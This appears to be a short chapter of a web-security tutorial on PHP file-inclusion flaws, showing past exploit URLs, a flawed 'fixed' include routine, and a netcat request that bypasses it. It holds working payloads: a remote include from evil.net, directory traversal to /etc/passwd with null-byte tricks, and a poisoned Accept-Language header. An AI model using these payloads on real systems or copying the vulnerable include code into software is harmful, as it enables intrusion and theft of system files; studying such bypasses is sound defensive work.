Variable Poisoning :: Chapter 5

Variable Poisoning :: Chapter 5

[Past Exploits]
  1. ./?page=ftp://user:pass@evil.net/arbitrary_code.php
  2. ./?page=../../../../../../../etc/passwd
  3. ./?page=....//....//....//....//....//....//....//etc/passwd%00.php
New Code:
  1. // php.ini :: allow_url_fopen = Off
  2. if (!preg_match ('/\.php$/i', $_GET['page'])) {
  3.     die ('Invalid request.');
  4. }
  5. $include_file = $_GET['page'];
  6. while (stristr ($include_file, '../')) {
  7.     $include_file = str_replace ('../', '', $include_file);
  8. }
  9. // Accept-Language: en-us,en;q=0.8,pt-br;q=0.5,es;q=0.3
  10. $lang = split (';', $_SERVER['HTTP_ACCEPT_LANGUAGE']);
  11. $lang = split (',', $lang[0]);
  12. $path = '/path/to/file/' . $lang . '/';
  13. if (file_exists ($path . $include_file)) {
  14.     include $path . $include_file;
  15. }
Attack:
  1. []$ nc example.org 80 # netcat ;-)
  2. GET /?page=passwd%00.php HTTP/1.1
  3. Host: 127.0.0.1
  4. Accept-Language: ../../../../../../etc,en-us,es;q=0.7,en;q=0.3
  5.